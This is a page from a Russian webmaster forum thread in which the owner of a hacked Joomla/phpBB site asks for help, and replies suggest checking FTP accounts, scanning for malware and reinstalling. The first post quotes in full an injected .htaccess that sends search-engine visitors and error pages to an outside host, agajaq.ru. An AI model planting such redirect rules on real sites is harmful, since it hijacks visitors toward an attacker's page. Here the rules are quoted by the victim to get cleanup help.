Как вылечить сайт?

(Ответов: 39, Просмотров: 6214)
Страница 1 из 4 123 Последняя
  1. Новичок
    • Регистрация: 12.04.2012
    • Сообщений: 29
    • Репутация: 0
    Здравствуйте. Постигла мой сайт беда... Какая-то редиска подменяет мне файл .htaccess, из-за чего при переходе из поисковика на мой сайт всех выбрасывает на главную страницу гугла. Если просто переходить по адресу, то всё нормально, сайт функционирует. Только на форуме в разделах типа "Новые сообщения" при нажатии на ссылки выкидывает всё на тот же гугл. Но сами топики и разделы форума работаю нормально. Сайт на Joomla 1.5.25, форум на phpbb3 (последняя версия).

    Вот содержимое подкидываемого мне .htaccess:

    PHP код:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond 
    %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://agajaq.ru/indigo?5 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://agajaq.ru/indigo?5 [R=301,L]
    </IfModule>

    ErrorDocument 400 http://agajaq.ru/indigo?5
    ErrorDocument 401 http://agajaq.ru/indigo?5
    ErrorDocument 403 http://agajaq.ru/indigo?5
    ErrorDocument 404 http://agajaq.ru/indigo?5
    ErrorDocument 500 http://agajaq.ru/indigo?5 
    Пробовал удалять, редактировать или заменять стандартным джумловским:

    PHP код:
    ##
    # @version $Id: htaccess.txt 10492 2008-07-02 06:38:28Z ircmaxell $
    # @package Joomla
    # @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
    # @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
    # Joomla! is Free Software
    ##
    #####################################################
    # READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
    #
    # The line just below this section: 'Options +FollowSymLinks' may cause problems
    # with some server configurations. It is required for use of mod_rewrite, but may already
    # be set by your server administrator in a way that dissallows changing it in
    # your .htaccess file. If using it causes your server to error out, comment it out (add # to
    # beginning of line), reload your site in your browser and test your sef url's. If they work,
    # it has been set by your server administrator and you do not need it set here.
    #
    #####################################################

    ## Can be commented out if causes errors, see notes above.
    Options +FollowSymLinks

    #
    # mod_rewrite in use

    RewriteEngine On

    ########## Begin - Rewrite rules to block out some common exploits
    ## If you experience problems on your site block out the operations listed below
    ## This attempts to block the most common type of exploit `attempts` to Joomla!
    #
    # Block out any script trying to set a mosConfig value through the URL
    RewriteCond %{QUERY_STRINGmosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
    # Block out any script trying to base64_encode crap to send via URL
    RewriteCond %{QUERY_STRINGbase64_encode.*\(.*\) [OR]
    # Block out any script that includes a <script> tag in URL
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    # Block out any script trying to set a PHP GLOBALS variable via URL
    RewriteCond %{QUERY_STRINGGLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    # Block out any script trying to modify a _REQUEST variable via URL
    RewriteCond %{QUERY_STRING_REQUEST(=|\[|\%[0-9A-Z]{0,2})
    # Send all blocked request to homepage with 403 Forbidden error!
    RewriteRule ^(.*)$ index.php [F,L]
    #
    ########## End - Rewrite rules to block out some common exploits

    # Uncomment following line if your webserver's URL
    # is not directly related to physical file paths.
    # Update Your Joomla! Directory (just / for root)

    # RewriteBase /
    ########## Begin - Joomla! core SEF Section
    #
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond 
    %{REQUEST_FILENAME} !-d
    RewriteCond 
    %{REQUEST_URI} !^/index.php
    RewriteCond 
    %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
    RewriteRule (.*) index.php
    RewriteRule 
    .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
    #
    ########## End - Joomla! core SEF Section 
    При таких действиях проблема решается примерно на час - полтора, после чего мой .htaccess самопроизвольно сносится и ставится его зараженная версия.

    Пробовал менять пароль от ФТП - безрезультатно. Пробовал ковыряться в "разрешениях" на этот файл: выставлено 444, если делать ниже - сайт не будет открываться.

    Саппорт хостера толком ничего, кроме как "вас взломали", не подсказал.

    Убился уже с этой проблемой, никак не могу понять, что именно гадит и как от этого избавиться. Прошу помощи форумчан.
    • 0
  2. Sunshine reggae Аватар для OKyJIucT
    • Регистрация: 02.09.2011
    • Сообщений: 3,240
    • Репутация: 1830
    • Webmoney BL: ?
    Посмотрите пользователей ФТП на хостинге, может кто то создал себе второй аккаунт и через него вас штурмует.
    • 0
  3. Новичок
    • Регистрация: 12.04.2012
    • Сообщений: 29
    • Репутация: 0
    OKyJIucT, пользователь один, то бишь я, пароли менял неоднократно.
    • 0
  4. Новичок Аватар для wayaka
    • Регистрация: 23.12.2009
    • Сообщений: 9
    • Репутация: 8
    Проверь сайт на вирусы
    • 0
  5. Новичок
    • Регистрация: 12.04.2012
    • Сообщений: 29
    • Репутация: 0
    wayaka, чем и как можно это сделать?
    • 0
  6. Новичок
    • Регистрация: 12.04.2012
    • Сообщений: 29
    • Репутация: 0
    Перезалил весь каталог public_html со старого бэкапа, в котором .htaccess был нормальный. Проверяю - вредоносный файл уже на месте! Как так?! Бред какой-то... Что ещё можно сделать?
    • 0
  7. Гуру Аватар для Я Джин
    • Регистрация: 20.03.2012
    • Сообщений: 579
    • Репутация: 154
    • Webmoney BL: ?
    а сам бекап чистый? посмотри на денвере (как работает), может нужно полностью снести под ноль и перезалить? антивирь молчит? вирус .htaccess сам меняет?
    • 0
  8. Опытный
    • Регистрация: 07.04.2012
    • Сообщений: 296
    • Репутация: 45
    • Webmoney BL: ?
    сейчас работаю над вирусами на своём сайте, но у меня дле а не джумла. Проблему решаю путём скачивания html файлов-дизайн шаблона к себе на комп, а всё лишнее переустанавливаю. Тоесть удаляю всё на фтп(дамп бд естественно делаю), ставлю новый движок, заливаю заново шаблон и востанавливаю дизайн. Через пару часов отпишусь, получилось ли выгнать вирус с сайта. PS в системных файлах админок хостинга тоже могут быть вирусы. Там нашёл 3 заражённых файла.
    • 0
  9. Гуру Аватар для Я Джин
    • Регистрация: 20.03.2012
    • Сообщений: 579
    • Репутация: 154
    • Webmoney BL: ?
    да кстати, в основном вирусня сидит в шаблонах
    • 0
  10. Опытный
    • Регистрация: 07.04.2012
    • Сообщений: 296
    • Репутация: 45
    • Webmoney BL: ?
    Я Джин, ав основном в яваскриптах. если есть возможность, удали все js файлы, поменяй пароли и залей новые может поможет.
    • 0
Страница 1 из 4 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
сайт (аукцион) Закономер Ру - сайт юридического фриланса.
Покупка продажа сайтов 0 25.11.2011 09:46
Сайт с мобильными приложениями, играми или вап-сайт, посещ. от 300
Покупка продажа сайтов 1 13.11.2011 18:34
сайт с посещалкой 700 хостов на сайт с ТИЦ
Покупка продажа сайтов 1 30.07.2011 00:04
Ваш сайт не проиндексирован (Сайт успешно добавлен в очередь на индексирование)
Поисковые системы 2 19.06.2011 11:38

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры